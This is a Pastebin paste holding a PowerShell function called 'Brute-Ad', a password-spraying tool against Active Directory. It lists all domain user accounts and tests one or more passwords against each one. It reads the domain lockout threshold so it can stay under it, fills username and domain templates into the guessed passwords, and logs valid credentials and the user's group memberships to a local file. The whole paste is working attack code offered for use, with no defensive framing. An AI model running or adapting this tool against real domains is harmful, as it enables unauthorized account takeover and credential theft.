SHARE
TWEET

Untitled

danj666 Sep 22nd, 2019 267 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <#
  2. .Synopsis
  3.     Brute forces active directory user accounts
  4. .DESCRIPTION
  5.     Brute forces active directory user accounts
  6. .EXAMPLE
  7.     PS C:\> Brute-Ad
  8.     Bruteforce all accounts in AD with a given password or list of passwords.
  9. .EXAMPLE
  10.     Brute-Ad -list password1,password2,'$password$','$Pa55w0rd$'
  11.     Brute force all accounts in AD with a provided list of passwords.
  12. .EXAMPLE
  13.     Brute-Ad -List password1
  14.     Brute force all accounts in AD with just one password.
  15. .EXAMPLE
  16.     Brute-Ad -list Password1,password2,'$password$','$Pa55w0rd$',password12345
  17.     The provided list will be used:  Password1 password2 $password$ $Pa55w0rd$ password12345
  18. .EXAMPLE
  19.     Brute-Ad -list Password1,password2 -domain test.ad.com
  20.  
  21.     Username        Password   IsValid
  22.     --------        --------   -------
  23.     {Administrator} $Pa55w0rd$ True  
  24.     {jdoe}          Password1  True
  25. #>
  26. function Brute-Ad
  27. {
  28. [cmdletbinding()]
  29. Param
  30. (
  31.         [string[]]$list,
  32.         $domain
  33. )
  34.     Write-Output ""
  35.     Write-Output "[+] Brute-ad module started"
  36.     Write-Output ""
  37.     if ($list)
  38.         {
  39.         $allpasswords = $list
  40.         Write-Output 'The provided list will be used: '$allpasswords`n
  41.         }
  42.         else
  43.         {
  44.         $allpasswords = @('Password1')
  45.         Write-Output 'The built-in list will be used: '$allpasswords`n
  46.         }
  47.  
  48.     Function Get-LockOutThreshold  
  49.     {
  50.         $domain = [ADSI]"WinNT://$env:userdomain"
  51.         $Name = @{Name='DomainName';Expression={$_.Name}}
  52.         $AcctLockoutThreshold = @{Name='Account Lockout Threshold (Invalid logon attempts)';Expression={$_.MaxBadPasswordsAllowed}}
  53.         $domain | Select-Object $AcctLockoutThreshold
  54.     }
  55.  
  56.     $lockout = Get-LockOutThreshold
  57.  
  58.     Function Test-ADCredential
  59.     {
  60.         Param($username, $password, $domain)
  61.         Add-Type -AssemblyName System.DirectoryServices.AccountManagement
  62.         $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
  63.         $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
  64.         $object = New-Object PSObject | Select-Object -Property Username, Password, IsValid
  65.         $object.Username = $username;
  66.         $object.Password = $password;
  67.         $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
  68.         return $object
  69.     }
  70.    
  71.     $username = ''
  72.  
  73.     $lockoutthres =  $lockout.'Account Lockout Threshold (Invalid logon attempts)'
  74.  
  75.     if (!$lockoutthres)
  76.     {
  77.         $passwords = $allpasswords #no lockout threshold
  78.     }
  79.     elseif ($lockoutthres -eq 1)
  80.     {
  81.         $passwords = $allpasswords | Select-Object -First 1
  82.     }
  83.     else
  84.     {
  85.         $passwords = $allpasswords | Select-Object -First ($lockoutthres -=1)
  86.     }
  87.  
  88.     if (!$domain)
  89.     {
  90.         $domain = $env:USERDOMAIN
  91.         $DirSearcher = New-Object System.DirectoryServices.DirectorySearcher([adsi]'')
  92.         $DirSearcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
  93.         $DirSearcher.FindAll().GetEnumerator() | ForEach-Object{
  94.  
  95.             $username = $_.Properties.samaccountname
  96.             foreach ($password in $passwords)
  97.             {
  98.                 if ($password.Contains("%username%") -eq $True)
  99.                 {
  100.                     $password = $password.Replace("%username%", $username.ToLower());
  101.                 }
  102.                 if ($password.Contains("%Username%") -eq $True)
  103.                 {
  104.                     $password = $password.Replace("%Username%", $username.ToLower());
  105.                     $password = $password.Replace($password[0],$password[0].ToString().ToUpper());
  106.                 }
  107.                 if ($password.Contains("%USERNAME%") -eq $True)
  108.                 {
  109.                     $password = $password.Replace("%USERNAME%", $username.ToUpper());
  110.                 }
  111.                 if ($password.Contains("%Domain%") -eq $True)
  112.                 {
  113.                     $password = $password.Replace("%Domain%", $domain);
  114.                 }
  115.                 if ($password.Contains("%domain%") -eq $True)
  116.                 {
  117.                     $password = $password.Replace("%domain%", $domain.ToLower());
  118.                 }
  119.                 $result = Test-ADCredential -username $username -password $password -domain $domain
  120.                 $result | Where {$_.IsValid -eq $True} | ForEach {
  121.                  $usergroups = (New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=User)(samAccountName=$($username)))")).FindOne().GetDirectoryEntry().memberOf -replace '^CN=([^,]+).+$','$1'
  122.                  Add-Content -Path .\Logsc.txt "[!]SPRAY FOUND"
  123.                  Add-Content -Path .\Logsc.txt  "*  $username`:$password"
  124.                  Add-Content -Path .\Logsc.txt "[-]USER GROUPS"
  125.                  Add-Content -Path .\Logsc.txt "$usergroups"
  126.                  Add-Content -Path .\Logsc.txt "============================================================================"
  127.                  echo "$username`:$password"
  128.                 }
  129.             }
  130.         }
  131.     } else {
  132.         $forest= [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
  133.         $domainname= $forest.Domains | ? {$_.Name -like "$($domain)*"}
  134.         if ($domainname.Count -gt 1) {
  135.             echo "[-] More than one match for domain: *$($domain)*"
  136.             echo "Please use FQDN"
  137.             echo $domainname
  138.         } else {
  139.             $domainDN=$domainname.GetDirectoryEntry().distinguishedName
  140.             $Searcher=New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$domainDN")
  141.             $Searcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
  142.             $domain = $domainname.name
  143.             $Searcher.FindAll().GetEnumerator() | ForEach-Object{
  144.  
  145.                 $username = $_.Properties.samaccountname
  146.                 foreach ($password in $passwords)
  147.                 {
  148.                     echo $username + " -- " + $password;
  149.                     $result = Test-ADCredential -username $username -password $password -domain $domain | Start-Sleep -m 500
  150.                     $result | Where {$_.IsValid -eq $True}
  151.                 }
  152.             }
  153.         }
  154.  
  155.     }
  156.  
  157.     Write-Output ""
  158.     Write-Output "[+] Module completed"
  159. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top